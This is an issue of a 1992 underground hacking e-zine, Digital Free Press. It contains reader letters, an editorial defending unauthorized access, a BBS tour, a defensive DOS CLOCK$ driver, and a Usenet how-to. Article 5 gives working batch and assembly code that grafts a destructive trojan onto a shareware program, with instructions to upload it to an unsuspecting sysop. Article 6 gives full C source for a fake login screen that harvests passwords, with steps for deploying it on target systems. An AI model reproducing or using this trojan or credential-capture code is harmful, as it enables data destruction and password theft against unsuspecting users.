home *** CD-ROM | disk | FTP | other *** search
/ The Hacker Chronicles - A…the Computer Underground / The Hacker Chronicles - A Tour of the Computer Underground (P-80 Systems).iso / miscpub2 / dfp.002 < prev    next >
Text File  |  1992-09-26  |  55KB  |  1,282 lines

  1.  
  2.  
  3.               #########             ############       #########
  4.               ###########           ############       ###########
  5.               ####    ####          ####               ####    ####
  6.               ####    ####          ####               ####    ####
  7.               ####    ####          ########           ###########
  8.               ####    ####          ########           #########
  9.               ####    ####          ####               ####
  10.               ####    ####          ####               ####
  11.               ###########           ####               ####
  12.               #########             ####               ####
  13.  
  14.                             DIGITAL FREE PRESS
  15. -------------------------------------------------------------------------------
  16.                     Volume 1.0                Issue 2.0
  17. -------------------------------------------------------------------------------
  18.  
  19.        * A Publication of The Underground Computing Foundation (UCF) *
  20.  
  21.             * Send Submissions to: hackers%underg@uunet.uu.net *
  22.  
  23.               * Editor: Max Cray (max%underg@uunet.uu.net) *
  24.  
  25.               * BBS: The Underground (401) 847-2603 (v.32) *
  26.  
  27. ------------------------------------------------------------------------------
  28.  
  29.                     Statement of Purpose and Disclaimer
  30.  
  31.     The Digital Free Press is an uncensored forum to document current
  32. activities in and of the world of modern technology. It is published under the
  33. premise that it is better to know, rather than not know, so no attempt is made
  34. to hide any information no matter how dangerous it may be. Information is a
  35. double edged sword. It is neither good nor bad, and can be used for either
  36. good or bad. Warning: Some information in this document could be used for
  37. illegal activities. Use at your own risk. Articles are the opinion of the
  38. authors listed, and not of the editor (unless of course the editor wrote
  39. it).
  40.  
  41. ------------------------------------------------------------------------------
  42. In this Issue:
  43.  
  44.     1. Mail to Max
  45.     2. Editorial: Old 'Hackers' vs. New 'Hackers' - Max Cray
  46.     3. A Tour of The Underground Computing Foundation BBS - Max Cray
  47.     4. Protection of DOS Devices - GodNet Raider
  48.     5. Overwriting Trojan - The BBC
  49.     6. Breaches of Security - The Joker
  50.     7. Getting on Usenet - Max Cray
  51.     8. The BBC's Crash House (Fun with ANSI.SYS) - The BBC
  52.  
  53. ------------------------------------------------------------------------------
  54. Mail to Max:
  55. ------------------------------------------------------------------------------
  56. Date: Tue, 31 Dec 91 23:49:32 -0500
  57. From: <Irate Upstream Sysadmin>
  58. X-Mailer: Mail User's Shell (7.2.2 4/12/91)
  59. To: underg!ccn
  60. Subject: digital free press
  61.  
  62. While investigating a problem with the mail and uucp queues on my system I
  63. discovered a message from you entitled "DIGITAL FREE PRESS Volume 1 Issue 1".
  64. The majority of this message gave details for activities that I consider to
  65. be either illegal or primarily malicious in nature.  As such, I refuse to
  66. have my computer system be involved in any way in the distribution of this
  67. material.  I realize that some people, perhaps including yourself, might
  68. construe this action as restricting the freedom of the press but rest
  69. assured that this is not the case.  I am in no way usurping your rights to
  70. say anything that you want to say, I am only refusing to help pay for it.
  71.  
  72. I will phone your system one last time to deliver this letter and then I
  73. will sever the uucp link.  If you wish to discuss this matter with me you
  74. may call me either at work during the day or at home in the evening.
  75. If I do not hear from you within two weeks I will return the unused portion
  76. of your $50.
  77.  
  78. --
  79. <Irate Upstream Sysadmin>
  80. %% Can I be excused, my brain is full. **
  81. --
  82. [Editor's note: Lesson here is be sure you know your upstream sysadmin's
  83. policy on distribution of controversial material. I was able to get the uucp
  84. connection back, but only after agreeing not to distribute DFP anymore
  85. through his site.]
  86. ----------------------------------------------------------------------------
  87. Date: Thu, 2 Jan 92 20:39:09 CST
  88. From: <Irate Pseudo Hacker>
  89. To: max@underg
  90. Subject: Re: DIGITAL FREE PRESS Volume 1 Issue 1
  91. Newsgroups: alt.hackers
  92. Organization: :noitazinagrO
  93.  
  94. You obviously have no idea about what alt.hackers is about, to refresh your
  95. memory, enclosed is a copy of an article you should have read earlier, but
  96. knowing your type, probably didn't.  please note that it EXPLICITLY states
  97. that this is not a forum for elitoid DOS pirate dumbshit WEENIES who like to
  98. call themselves "hackers". go back to WWIVnet or Celeritynet or whatever
  99. pirate-net it is that people like you use nowadays, asshole.
  100.  
  101. [alt.hackers FAQ deleted]
  102.  
  103. P.S.  Please do not post this type of material here again.
  104. --
  105. <Irate Pseudo Hacker>
  106. --
  107. [Editor's note: How can this person hope to influence people by being so
  108. confrontational? In fact the response I got from the first issue of DFP was
  109. about 90% positive, and there were many requests to be put on the mailing
  110. list. Thanks for your support, and please keep the mail coming!]
  111.  
  112. ------------------------------------------------------------------------------
  113. ------------------
  114. | Article 2 of 8 |    EDITORIAL
  115. ------------------
  116.                               Real Hackers?
  117.  
  118.     There is a lot of talk these days about how the word 'hacker' has been
  119. redefined by the press. The theory is that the old hackers, as portrayed in
  120. Steven Levy's excellent book _Hackers: Heroes of the Computer Revolution_,
  121. were good and pure and this breed of hacker dramatized in the press is some
  122. new evil non-hacker terrorist. This is nonsense.
  123.  
  124.     According to the book, the hacker ethic(paraphrased) is as follows:
  125.  
  126.     1. Access to computers should be unlimited and total.
  127.  
  128.     2. All information should be free.
  129.  
  130.     3. Mistrust Authority - Promote Decentralization.
  131.  
  132.     4. Hackers should be judged by their hacking.
  133.  
  134.     5. You can create art and beauty on a computer.
  135.  
  136.     6. Computers can change your life for the better.
  137.  
  138.     In pursuit of the hacker ethic these heroes performed various acts that
  139. would not be looked upon favorably in today's anti-hacker society:
  140.  
  141. Used Equipment Without Authorization (Page 20)
  142. ----------------------------------------------
  143.  
  144.     "    So, without any authorization whatsoever, that is what Peter Sampson
  145.      set out to do, along with a few friends of his from an MIT organization
  146.      with a special interest in model railroading. It was a casual, unthinking
  147.      step into a science-fiction future, but that was typical of the way that
  148.      an odd subculture was pulling itself up by its bootstraps and growing to
  149.      underground prominence-to become a culture that would be the impolite,
  150.      unsanctioned soul of computerdom. It was among the first computer
  151.      hacker escapades of the Tech Model Railroad Club, or TMRC."
  152.  
  153. Phone Phreaked (Page 92)
  154. ------------------------
  155.  
  156.     "He had programed some appropriate tones to come out of the speaker and
  157.      into the open receiver of the campus phone that sat in the Kluge room.
  158.      These tones made the phone system come to attention, so to speak, and
  159.      dance."
  160.  
  161. Modified Equipment Without Authorization (Page 96)
  162. --------------------------------------------------
  163.  
  164.     "    Nelson thought that adding an 'add to memory' instruction would
  165.      improve the machine. It would take _months_, perhaps, to go through
  166.      channels to do it, and if he did it himself he would learn something
  167.      about the way the world worked. So one night Stewart Nelson spontaneously
  168.      convened the Midnight Computer Wiring Society."
  169.  
  170. Circumvented Password Systems (Page 417)
  171. ----------------------------------------
  172.  
  173.     "Stallman broke the computer's encryption code and was able to get
  174.      to the protected file which held people's passwords. He started
  175.      sending people messages which would appear on screen when they
  176.      logged onto the system:
  177.  
  178.         'I see you chose the password [such and such]. I suggest that
  179.          you switch to the password "carriage return." It's much
  180.          easier to type, and also it stands up to the principle that
  181.          there should be no passwords.'
  182.  
  183.     'Eventually I got to the point where a fifth of all the users on
  184.      the machine had the Empty String password.' RMS later boasted.
  185.      Then the computer science laboratory installed a more sophisticated
  186.      password system on its other computer. This one was not so easy for
  187.      Stallman to crack. But Stallman was able to study the encryption
  188.      program, and as he later said, 'I discovered changing one word in
  189.      that program would cause it to print out your password on the system
  190.      console as part of the message that you were logging in.' Since
  191.      the 'system console' was visible to anyone walking by, and its
  192.      messages could easily be accessed by any terminal, or even printed
  193.      out in hard copy, Stallman's change allowed any password to be
  194.      routinely disseminated by anyone who cared to know it. He thought
  195.      the result 'amusing.'
  196.  
  197.     Certainly these hackers were not anarchists who wanted only to destroy.
  198. They had a personal code of ethics, the hacker ethic to base their behavior
  199. on. In fact the modern hacker has his/her ethics intact. Compare the above
  200. hacker ethic with the hacker ethic found in _Out of the Inner Circle_ by
  201. Bill 'The Cracker' Landreth, a teenager arrested by the FBI (Page 18,60):
  202.  
  203.     1. Never delete any information you can not easily restore.
  204.  
  205.     2. Never leave any names on a computer.
  206.  
  207.     3. Always try to obtain your own information.
  208.  
  209.     The common denominator to these ethics systems are the respect for
  210. technology, and the personal growth through free access and freedom of
  211. information. Certainly the attitude towards private property is the same.
  212. Accessing and using equipment that you do not own is okay as long as
  213. you do not prevent those who own it from using it, or damage anything.
  214.  
  215.     With respect to the hacker ethic the hackers mentioned in _Cyberpunk:
  216. Outlaws and Hackers on the Computer Frontier_ by Katie Hafner and John
  217. Markoff were in fact good hackers. If free access, and free information
  218. were the law of the land would Kevin Mitnick have gone to jail? I do not
  219. think so. Sure he got the source code for VMS, but is there any evidence
  220. that he used this information for personal gain, or did he simply use the
  221. information to improve his understanding of the VMS operating system?
  222.  
  223.     Robert T. Morris's worm program was a clever hack. Of course he 'gronked'
  224. it by programming the replication rate much too fast, but still there is no
  225. evidence that he had any intention of doing harm to the system. It was simply
  226. a computer experiment. Who owns the Internet? Is it some mysterious 'them'
  227. or is it our net? If it is out net, then we should be able to try some stuff
  228. on it, and to heck with 'them' if they can't take a joke.
  229.  
  230.     Of course the German hackers are a different story. What they got in
  231. trouble for was espionage, and not hacking, which is a breach of faith,
  232. and is hacking for personal gain. However selling Minix to the KGB almost
  233. makes it forgivable...
  234.  
  235.     It is my contention that hackers did not change. Society changed, and it
  236. changed for the worse. The environment the early hackers were working in
  237. correctly viewed these activities as the desire to utilize technology in a
  238. personal way. By definition hackers believe in the free access to computers
  239. and to the freedom of information. If you do not believe in these principles
  240. you are not a hacker, no matter how technologically capable you are. You
  241. are probable just a tool for the greed society. Current bad mouthing of
  242. hackers is simply snobbery. Rather than cracking down on the modern hacker, we
  243. should reinforce the hacker ethic, a code of conduct not based upon greed and
  244. lust for the almighty dollar, but instead for personal growth through the free
  245. access of computers and information, and a respect for technology.
  246.  
  247. It is the humane thing to do.
  248.  
  249. ------------------------------------------------------------------------------
  250. ------------------
  251. | Article 3 of 8 |
  252. ------------------
  253.  
  254.               A Tour of the Underground Computing Foundation BBS
  255.                                 by Max Cray
  256.  
  257.     I have noticed a lot of people call The UCF BBS and are unable to find
  258. the good stuff, so let me take the opportunity to point out a few of the
  259. high spots. First of all it is connected to the Usenet. Your international
  260. e-mail address would be <username>%underg@uunet.uu.net. With this address
  261. you can subscribe to all the good stuff like Phrack and NIA. There is also
  262. a mailing list: hackers%underg@uunet.uu.net. E-mail me if you want to be
  263. included on the list.
  264.      You can participate in the Usenet newsgroups, of which alt-cud-digest
  265. is a must. alt.dcom.telecom is an outstanding resource for those interested
  266. in the telephone network. There is vast amounts of very technical information
  267. that passes through on a daily basis. Far too much to read it all. Type
  268. USENET at the prompt to see all the newsgroups. Type in the name of the group
  269. you want, and then type the READ command. Type the number of the first
  270. message you want to read. If you call often you will want to configure your
  271. NEW message scan using the JOIN command. Type ? at the prompt to get help.
  272. There is a more local network set up, which has a newsgroup called ri.cug.
  273. This is the Rhode Island Computer Underground, and it contains info on the
  274. local scene around here.
  275.     If you are interested in journals type INFO. I try to keep the latest
  276. issues of NIA, PHRACK, CUD, EFFector, and other journals here. If you are
  277. interested in back issues go into the files section and LOG into the directory
  278. /public/text. You can view or download text philes here. There is also some
  279. stuff of interest in the /public/hacks directory. The /public/comm directory
  280. contains subdirectories for the WAFFLE philes, and UUPC philes that you may
  281. need to connect to the UUCP network.
  282.     Sorry there are no codez as it is an information board and not a pirate
  283. board.
  284.  
  285. ------------------------------------------------------------------------------
  286. ------------------
  287. | Article 4 of 8 |
  288. ------------------
  289.                       -=[ Protection of DOS devices ]=-
  290.  
  291.                                      -or-
  292.  
  293.                   /*******************************************/
  294.                   /* Unarc, Unzip, Lha extract, and be merry */
  295.                   /*         for tomorrow we may lock.       */
  296.                   /*******************************************/
  297.  
  298.                                 - written by -
  299.                                  GodNet Raider
  300.                                     - of -
  301.                              The CyberUnderground
  302.  
  303.  -=[ "Information is the greatest weapon of power to the modern wizard." ]=-
  304.  
  305. ]----------------------------------------------------------------------------[
  306.  
  307. Introduction:
  308. -------------
  309.  
  310.     This phile is written in response to the practice of misusing using
  311. MS-DOS devices (ie.. to make archive bombs). The following will explain the
  312. problem and some of the possible solutions. Also included is an ASM source
  313. that will remap the 'CLOCK$' device to a 'NUL' (basic bit bucket) type
  314. device.
  315.  
  316. The problem:
  317. ------------
  318.  
  319.         In a never ending attempt of OS designers to mask the inner workings
  320. of system hardware, the idea of device drivers comes into play. A device
  321. driver is basically an attempt to standardize I/O with the systems' hardware.
  322. Thus allowing access to every thing from keyboards to CD ROMS without an
  323. in depth knowledge of the physical hardware involved.
  324.  
  325.         This ideal is valid and of great help in program development, yet when
  326. the drivers are not well defined there is the tendency for them to cause
  327. more harm then good. A case in point is the 'CLOCK$' device in MS-DOS.
  328.  
  329.         'CLOCK$' is a driver designed to allow updating of the CMOS clock.
  330. It passes data direct to the CMOS clock with out buffering or any attempt
  331. at error checking. Thereby passing valid data as well as invalid. An with
  332. no internal mechanism to detect an overflow condition/not sending EOF after
  333. a read will tend to hang systems/knock out the date and time stored in the
  334. CMOS clock. This problem has come of use to the hacker community.
  335.  
  336.         Several methods of the assault have been:
  337.  
  338.                 1)      Uploading 'CLOCK$.*' files to remote systems.
  339.  
  340.                 2)      Using BBS archiveing utilities to create 'CLOCK$.*'
  341.                         files for download.
  342.  
  343.                 3)      Low level disk editing of archive files to rename files
  344.                         in it to 'CLOCK$.*'
  345.  
  346. Some possible solutions:
  347. ------------------------
  348.  
  349.         Of the solutions available none are complete. There are benefits and
  350. disadvantages to each. Nor is the following a complete list, it is only
  351. an attempt to discus some of the common ones.
  352.  
  353.         Abstinence:
  354.                 Not excepting/expanding archive files on ones system. This is
  355.                 the most undesirable but most effective and is only listed
  356.                 'for abstinence makes the heart grow fonder'.
  357.  
  358.         Scanning archives:
  359.                 Most archive programs come with a utility to view the files
  360.                 stored in a given archive (lha v foobar.lzh). The only real
  361.                 drawback is having to take the time to scan archives. This
  362.                 does not protect from BBS's that create real time archives,
  363.                 extract to check for virus batches (with out looking thought
  364.                 the archive first), uploads of 'CLOCK$.*' files, and programs
  365.                 that create and write to a 'CLOCK$.*' file.
  366.  
  367.         Updating programs:
  368.                 Getting new versions of programs that watch for 'CLOCK$.*' and
  369.                 avoid creating/writing to said file is a problem in that you
  370.                 must wait for the author to come up with the fix and have to
  371.                 pay for the update. Another reason for software makers to
  372.                 release code with their programs.
  373.  
  374.         TSR protection programs:
  375.                 Other than yet another drain on precious RAM and clock time.
  376.                 Can only protect from programs that create files though
  377.                 interrupts. Pipes and redirects may slip though the cracks.
  378.  
  379.         LOW LEVEL disk editing of io.sys files:
  380.                 Renaming the 'CLOCK$' device is a method that will protect on
  381.                 all levels but may cause some programs to hang that use it.
  382.                 Also to replace it is not easy for you must reedit the file
  383.                 (without moving it). It should also be noted that the new name
  384.                 MUST be the same size as the original (6 letters).
  385.  
  386.         Creation of a new 'CLOCK$' device:
  387.                 This offers the protection of the above method with out the
  388.                 need of changing OS binary files and to allow/disallow the
  389.                 ORIGINAL 'CLOCK$' device by editing the config.sys file
  390.                 instead. One disadvantage is that update of the CMOS clock
  391.                 though 'CLOCK$' is stoped. Yet the BIOS clock is still
  392.                 accessible and the CMOS clock can be updated though the BIOS
  393.                 setup routine or programs that write direct to CMOS. Source
  394.                 for a simple null mask clock device driver is provided below
  395.                 and can be use as a template to create your own 'CLOCK$'
  396.                 replacement.
  397.  
  398.         There are other solutions to this problem not listed here.
  399.  
  400. Clock$ null device Source Code:
  401. -------------------------------
  402.  
  403.         The following ASM code is for a DOS device driver that will replace
  404. the existing 'CLOCK$' device when added to the config.sys file
  405. (device=outclock.sys).
  406.  
  407.         The key points of the device are:
  408.  
  409.                 1)      The line - DW 8080h. This tells the device loader that
  410.                         outclock wishes to replace the present clock device
  411.                         with it's self. This will trap all internal calls and
  412.                         to redirect any calls to the new driver.
  413.  
  414.                 2)      The line - DB 'CLOCK$  '. This will setup the device
  415.                         to trap external access though pipes, indirects, file
  416.                         I/O, and IOCTL's.
  417.  
  418.                 3)      The device strategy is to simply ignore all incoming
  419.                         commands to the device (standard practice for the
  420.                         'NUL' device).
  421.  
  422.         This driver does not prevent access to the CMOS clock except though
  423. the CLOCK$ device. So it will not effect the running of programs EXCEPT
  424. those that try to update the CMOS clock though the this device.
  425.  
  426.  +---- Cut Here ----+---- Cut Here ----+---- Cut Here ----+---- Cut Here ---+
  427.  
  428. CSEG    segment public 'CODE'
  429.                 org 0
  430.                 assume CS:CSEG, DS:CSEG, ES:CSEG
  431. DEVICE          proc far
  432.                         DD 0ffffffffh       ;------------------------------;
  433.                         DW 8080h            ; The following 5 definitions  ;
  434.                         DW DEV_STRATEGY     ; 18 (bytes) MUST be at offset ;
  435.                         DW DEV_INTERRUPT    ; 0 in the binary file.        ;
  436.                         DB 'CLOCK$  '       ;------------------------------;
  437. KEEP_ES         DW ?
  438. KEEP_BX         DW ?
  439. FUNCTIONS       label word
  440.                         DW INIT
  441.                         DW CHK_MEDIA
  442.                         DW MAKE_BPB
  443.                         DW IOCTL_IN
  444.                         DW INPUT_DATA
  445.                         DW NONDSTRCT_IN
  446.                         DW INPUT_STATUS
  447.                         DW CLEAR_INPUT
  448.                         DW OUTPUT_DATA
  449.                         DW OUTPUT_VERIFY
  450.                         DW OUTPUT_STATUS
  451.                         DW CLEAR_OUTPUT
  452.                         DW IOCTL_OUT
  453.  
  454. DEV_STRATEGY:
  455.                         mov CS:KEEP_ES, ES
  456.                         mov CS:KEEP_BX, BX
  457.                         ret
  458.  
  459. DEV_INTERRUPT:
  460.                         push ES
  461.                         push DS
  462.                         push AX
  463.                         push BX
  464.                         push CX
  465.                         push DX
  466.                         push SI
  467.                         push DI
  468.                         push BP
  469.                         mov AX, CS:KEEP_ES
  470.                         mov ES, AX
  471.                         mov BX, CS:KEEP_BX
  472.                         mov ES:word ptr [BX] + 3, 0000h
  473.                         mov AL, ES:[BX] + 2
  474.                         shl AL, 1
  475.                         xor AH, AH
  476.                         lea DI, FUNCTIONS
  477.                         add DI, AX
  478.                         jmp word ptr [DI]
  479.  
  480. INIT:
  481.                         lea AX, E_O_P
  482.                         mov ES:word ptr [BX] + 14, AX
  483.                         mov ES:word ptr [BX] + 16, CS
  484.                         jmp short QUIT
  485.  
  486. INPUT_STATUS:
  487. KEY_READY:
  488. NONDSTRCT_IN:
  489. INPUT_DATA:
  490. OUTPUT_DATA:
  491. OUTPUT_VERIFY:
  492. CHK_MEDIA:
  493. MAKE_BPB:
  494. IOCTL_IN:
  495. IOCTL_OUT:
  496. OUTPUT_STATUS:
  497. CLEAR_OUTPUT:
  498. CLEAR_INPUT:
  499. QUIT:
  500.                         or ES:word ptr [BX] + 3, 0100h
  501.                         pop BP
  502.                         pop DI
  503.                         pop SI
  504.                         pop DX
  505.                         pop CX
  506.                         pop BX
  507.                         pop AX
  508.                         pop DS
  509.                         pop ES
  510.                         ret
  511. E_O_P:
  512. DEVICE          endp
  513. CSEG            ends
  514.                         end     DEVICE
  515.  
  516.  +---- Cut Here ----+---- Cut Here ----+---- Cut Here ----+---- Cut Here ---+
  517.  
  518. ]============================================================================[
  519.  
  520.  underg!tsf!gnr@uunet.uu.net (GodNet Raider)
  521.          -=[ "You gotta learn to listen, before you learn to play." ]=-
  522.  
  523. ------------------------------------------------------------------------------
  524. ------------------
  525. | Article 5 of 8 |
  526. ------------------
  527.  
  528. To: hackers@underg.UUCP
  529. Subject: Text phile 2
  530. From: bbc@tsf.UUCP (The BBC)
  531. Organization: The CyberUnderground
  532.  
  533.     Welcome class... An now... for another lesson in the misuse of
  534. computers...
  535.  
  536.     So you thought that INJECT.BAT was fun... But you did not like
  537. the idea of making the injection give the fun away by causing the
  538. host program to crash after the trojan ran... Well then lets get a
  539. little more sophisticated then... Now rather than overwriting the
  540. existing host code lets just... Oooooh... Say... Add a new function
  541. to an existing program... Now what to add... Something
  542. destructive???? Why not...
  543.  
  544.     Ok How about a bit o' code that just moves the absolute disk
  545. write interrupt to the clock interrupt... Then each time the clock
  546. ticks (about 18 times a second) the computer attempts a disk write
  547. with random data... Good way to test THOSE ol' ALT-CTRL-DEL
  548. reflexes... Oooooh... What fun, it is to crash, in a one drive
  549. nonbacked-up system...
  550.  
  551.     Well now for the fun part...
  552.  
  553.     Step 1:
  554.  
  555.         Make a batch file called "ADDON.BAT" an in it place
  556.         the following commands -
  557.  
  558.         =============================================================
  559.          echo off
  560.          cls
  561.          rename %2 temp2.tp > nul
  562.          copy %1+temp2.tp %2 /b > nul
  563.          erase temp2.tp > nul
  564.         =============================================================
  565.  
  566.     Step 2:
  567.  
  568.         Make a ASM file called "TROJAN.ASM" an in it place the
  569.         following -
  570.  
  571.         =============================================================
  572.          PROGSEG    segment para public 'CODE'
  573.              assume CS:PROGSEG
  574.          DOIT    proc
  575.                  wSaveDS dw 9090h   ; Store old DS register here...
  576.                  mov AX, DS
  577.                  mov CS:wSaveDS, AX ; Save DS address for hosts'
  578.                                     ;     use...
  579.  
  580.                  ;-------------- v Place Trojan Here v -------------;
  581.  
  582.                  mov AX, 3526h ; Get DOS absolute write interrupt...
  583.                  int 21h
  584.                  mov DX, BX    ; Set clock interrupt to returned
  585.                                ;     value...
  586.                  mov AX, ES
  587.                  mov DS, AX
  588.                  mov AX, 2508h
  589.                  int 21h
  590.                  xor BX, BX   ; Rezap used registers [other than
  591.                               ;    AX/DS/ES]...
  592.                  xor CX, CX
  593.                  xor DX, DX
  594.  
  595.                  ;--------------- ~ Place Trojan Here ~ ------------;
  596.  
  597.                  mov AX, CS:wSaveDS   ; Restore DS, ES registers for
  598.                                       ;     host...
  599.                  mov DS, AX
  600.                  mov ES, AX
  601.                  xor AX, AX
  602.          DOIT    endp                 ; Host will start after this
  603.                                       ;     point...
  604.          PROGSEG ends
  605.                  end
  606.         =============================================================
  607.  
  608.     Step 3:
  609.  
  610.         Then assemble and link the trojan file. Use exe2bin [or
  611.         whatever utility you have to convert .EXEs to .COM format]
  612.         to make a .COM file out of TROJAN.EXE.....
  613.  
  614.     Step 4:
  615.  
  616.         Then copy a *.COM file into the same directory. Should
  617.         be part of some shareware thing that the target sysop would
  618.         like. With docs an all... would not want them to get
  619.         suspicious, now would we.............
  620.  
  621.     Step 5:
  622.  
  623.          Run the following command from the dos prompt...
  624.  
  625.              ADDON <Trojan file> <COM file to add trojan to>
  626.  
  627.     Step 6:
  628.  
  629.        Upload the mess to the unsuspecting sysop and watch the fun!
  630.  
  631.  
  632.     See and you thought hacking was hard...... Of course if they
  633. get smug and start searching for the added code.... We'll just have
  634. to add extra code (nops' ect) and/or switching some of the code
  635. around in the ASM file...
  636.  
  637. 'Another fine mess' from...
  638. The BBC
  639.  
  640. ---------------------------------------------------------------------
  641.  ...uunet!rayssd!galaxia!underg!tsf!bbc (The BBC)
  642.              -=[ "Anarchy is never HAVING to say you're sorry." ]=-
  643.  
  644. ------------------------------------------------------------------------------
  645. ------------------
  646. | Article 6 of 8 |
  647. ------------------
  648.  
  649.                                                         Breaches of Security
  650.                                                                           by
  651.                                                                    The Joker
  652.                                                        ----------------------
  653.  
  654.     Hello loves, Here we are with yet another page from the _Tomb of
  655. Ultimate Evil_ (THOSE of good aliment must make a saving throw against
  656. neophytedom).
  657.  
  658.     Todays chat is on the subject of collecting passwords, not that anyone
  659. here would have nothing but nobel reasons to do such a thing. An in
  660. this wonderfully wacky world of networks, UNIX, and VMS it's just the in
  661. t'ing to do. So now boys and girls, hacks and hacketts, Rocky and
  662. bullwinkel let us begin.
  663.  
  664.     Ah, what a tangled web we weave when first we practice to deceive...
  665. Yet how easy it makes it to get what we want. An deception is the key
  666. here. For thanks to the simple format of most logins (name, password...
  667. rank, serial number, underwear condition...). The simplicity of the answer
  668. makes it a wonderful little exercise in shell programming.
  669.  
  670.     What is needed is a simple program that pretends it's a login shell
  671. and is set like a little program beartrap. Sitting quietly, waiting
  672. for that most elusive of pray... The north american password! (An them's
  673. good eating too). So as we send our assistant into the system to wrestle
  674. and subdue the foul beasty, let us listen to a message from the good folks
  675. at Mutual of Omaha... Ooop sorry, instead let us look at a model of a simple
  676. password capture shell. What? You want the insurance commercial instead...
  677. Well, tough cookies.
  678.  
  679. |------------------------------[ Cut Line ]----------------------------------|
  680.  
  681. /*
  682.     LogTrap.c
  683.         (c) 1992 by Joculator inc., no rights reserved (or respected).
  684.             Rubber cell #182
  685.             Arkham Asylum
  686.             Gotham City
  687.  
  688.         Captures first login attempt by a user, to file (*szKeepFile),
  689.     then give phony error (*szPhonyError) and call real login shell
  690.     (*aszRealShell []). For the express purpose of promoting glorious
  691.     world chaos.
  692. */
  693.  
  694. #include <stdio.h>
  695. #include <stdlib.h>
  696. #include <process.h>
  697.  
  698. #define TRUE 1
  699. #define MAX_BUFFER 256
  700. #define ECHO 0
  701. #define NOECHO 1
  702. #define NEWLINE "\n"
  703. #define ANSI_CLS "\x1b[2J"
  704. #define ANSI_NOECHO "\x1b[8m                                        \x1b[40D"
  705. #define ANSI_ECHO "\x1b[0m"
  706.  
  707. struct
  708.     {
  709.      char
  710.         *szPrompt,
  711.         fNoEcho;
  712.     } *ptPrompts,
  713.       Prompts [] =  /* Prompts patterned after real login shell. */
  714.         {
  715.       /* [Prompt string], [ECHO | NOECHO] */
  716.          "Login: "      , ECHO,
  717.          "Password: "   , NOECHO,
  718.          NULL
  719.         };
  720.  
  721. char
  722.     *szPhonyError = "Invalid login.\n",    /* Error patterned after LOGIN. */
  723.     *aszRealShell [] =  /* Command to call real LOGIN. */
  724.         {
  725.          "LOGIN",
  726.           /* list parameters (if any) here */
  727.           NULL
  728.          },
  729.     *szKeepFile = "tmp0167.tmp",   /* Save booty in... */
  730.     szWorkBuffer [MAX_BUFFER];
  731.  
  732. void
  733.     main (void);
  734.  
  735. void main (void)
  736. {
  737.     FILE
  738.         *OutStream;
  739.  
  740.     /* Cover our tracks. */
  741.     printf (ANSI_CLS);
  742.     /* Prompt for and save user information. */
  743.     for (ptPrompts = Prompts; ptPrompts->szPrompt; ptPrompts++)
  744.         {
  745.          printf (ptPrompts->szPrompt);
  746.          if (ptPrompts->fNoEcho)
  747.             printf (ANSI_NOECHO);
  748.          fgets (szWorkBuffer, MAX_BUFFER, stdin);
  749.          if (ptPrompts->fNoEcho)
  750.              printf (ANSI_ECHO);
  751.          /* If file error, ignore it but, don't try to write to file. */
  752.          if (OutStream = fopen (szKeepFile, "a"))
  753.             {
  754.              fputs (ptPrompts->szPrompt, OutStream);
  755.              fputs (szWorkBuffer, OutStream);
  756.             }
  757.          fclose (OutStream);
  758.         }
  759.     /* Stick tongue out, Naaaa... */
  760.     printf (szPhonyError);
  761.     /* Commit process suicide by running LOGIN shell on top of our process. */
  762.     /* It should not return (unlike a bad check). */
  763.     execvp (aszRealShell [0], &aszRealShell [1]);
  764.     /* if execvp () (it got to this point?), lock system. */
  765.     while (TRUE);
  766. }
  767.  
  768. |------------------------------[ Cut Line ]----------------------------------|
  769.  
  770.     So there you have it. Now all that is left to do is:
  771.  
  772.         1: Set Prompts [], *szPhonyError, and *aszRealShell [] to match the
  773.            LOGIN of the target system.
  774.  
  775.         2: Set *szKeepFile to where you want your ill gotten booty to go.
  776.  
  777.         3: Compile the whole mess.
  778.  
  779.         4: LOGIN to the target system and run the program. For more fun
  780.            place copies on more than one terminal, if possible, on the same
  781.            system.
  782.  
  783.         5: Run to your duck blind and wait for a user to spring your lil'
  784.            trap.
  785.  
  786.     That's it, have fun, And remember...
  787.         If someone offers you drugs, just say... Yo!
  788.  
  789. ----------------------------------------------------------------------
  790.  
  791.  ...uunet!rayssd!galaxia!underg!tsf!joker (The Joker)
  792.        -=[ "All it takes is one bad day, then maddness has its way." ]=-
  793.  
  794. ------------------------------------------------------------------------------
  795. ------------------
  796. | Article 7 of 8 |
  797. ------------------
  798.  
  799.                            Getting on Usenet
  800.                               by Max Cray
  801.  
  802.     Much of the information from this phile comes from the excellent text
  803. phile INTRO.DOC that comes with the Waffle BBS package. Other information
  804. was gained from various books, and postings on the net itself, especially
  805. the FAQs (Frequently Asked Questions) postings in news.answers, and also my
  806. personal experience.
  807.  
  808.     Before you actually connect your machine to Usenet, it may be easier
  809. for you to learn about Usenet, and what it can do for you, by calling a
  810. BBS that is connected to Usenet. Good choices would be my own Underground,
  811. or any of the systems listed in the *nixpub. This is a document regularly
  812. posted to the Usenet listing all known unix bbs systems. You can get a copy
  813. of this from my bbs or from the following sources:
  814.  
  815.             o  anonymous uucp from jabber.
  816.                     +1 215 348 9727 [Telebit access]
  817.                     LOGIN: nuucp  NO PWD   [no rmail permitted]
  818.                 this list: /usr/spool/uucppublic/nixpub.short
  819.                 long list: /usr/spool/uucppublic/nixpub
  820.             o  "*NIX Depot" BBS on jabber.
  821.             o  USENET, regular posts to:
  822.                     comp.misc
  823.                     alt.bbs
  824.             o  the nixpub electronic mailing list.
  825.                     to be included or deleted from this distribution,
  826.                     send mail to nixpub-list-request@ls.com.
  827.             o  anonymous ftp from GVL.Unisys.COM [128.126.220.102]
  828.                     under /pub/nixpub/{long,short}
  829.             o  archive server from cs.widener.edu.
  830.                     mail to archive-server@cs.widener.edu
  831.                     Subject: or body of
  832.                             send nixpub long
  833.                      or
  834.                             send nixpub short
  835.                      or
  836.                             send nixpub long short
  837.                      or even
  838.                             index nixpub
  839.  
  840.     I will talk more about anonymous uucp, mailing lists, and archive servers
  841. in a minute.
  842.  
  843. UUCP SOFTWARE
  844.  
  845.     The first thing you need to connect your machine to the Usenet is
  846. software, and the first choice would be a version of the unix operating system
  847. itself. In fact to get a copy of the real thing is not that expensive anymore.
  848. As of this writing Consensys Corporation (1301 Pat Booker Rd., Universal City,
  849. TX, 78148, 1-800-387-8951) has UNIX System V Release 4 (the latest) including
  850. C development, Networking, and X Windows, for 386+ systems for $495. Certainly
  851. a big chunk of change, but a great deal for what you get. If cost is important
  852. you might try Coherent by Mark Williams Company (60 Revere Dr., Northbrook,
  853. IL. 60062, 1-800-627-5967). This is a less robust unix clone os that should
